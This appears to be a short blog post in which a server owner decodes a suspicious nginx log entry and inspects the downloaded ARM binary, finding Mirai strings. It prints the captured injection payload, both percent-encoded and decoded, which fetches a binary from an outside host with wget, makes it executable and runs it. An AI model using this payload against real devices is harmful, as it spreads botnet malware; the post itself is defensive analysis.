I was going through my nginx access.log file, and I noticed something interesting.
[IP redacted] - - [25/Mar/2017:10:55:50 -0400] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%5B%72%65%64%61%63%74%65%64%5D%2F%64%6C%72%2E%61%72%6D%3B%63%68%6D%6F%64%20%37%37%37%20%2A%3B%2E%2F%64%6C%72%2E%61%72%6D HTTP/1.1" 404 570 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
Normally, the thing after the word “GET” would be a normal route—something like
not something completely obfuscated by percent-encoding.
Since I understandably wanted to see what that actually said, I ran it through a decoder:
/shell?cd /tmp;wget http://[redacted]/dlr.arm;chmod 777 *;./dlr.arm
That’s interesting. It’s trying to execute some shell commands to download and run some executable file by making a GET request with the commands in the URL. Whatever it was trying to run, I’m sure it wasn’t good.
So I did the sensible thing and downloaded the file to look at it.
$ curl -O http://[redacted]/dlr.arm
$ file dlr.arm
dlr.arm: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
Well, it is actually an ARM executable. I was honestly half-expecting the file extension to be a lie to throw people off. What else can we learn?
$ strings dlr.arm
MIRAI
dvrHelper
GET /mirai/mirai.arm HTTP/1.0
.shstrtab
.text
.rodata
.bss
Mirai is malware that targets Internet of Things (IoT) devices, which explains why it was an ARM executable. Once a device is compromised by Mirai, it becomes part of a botnet.
Just for additional confirmation, I scanned the file with
I’m not so sure that this is Mirai itself, though. That GET request makes me think that it’s something that downloads the actual Mirai executable from somewhere else—but if that is the case, then why isn’t there a remote IP address or URL in the output of
I might look into it more later, but going through the assembly output of
doesn’t sound like fun right now.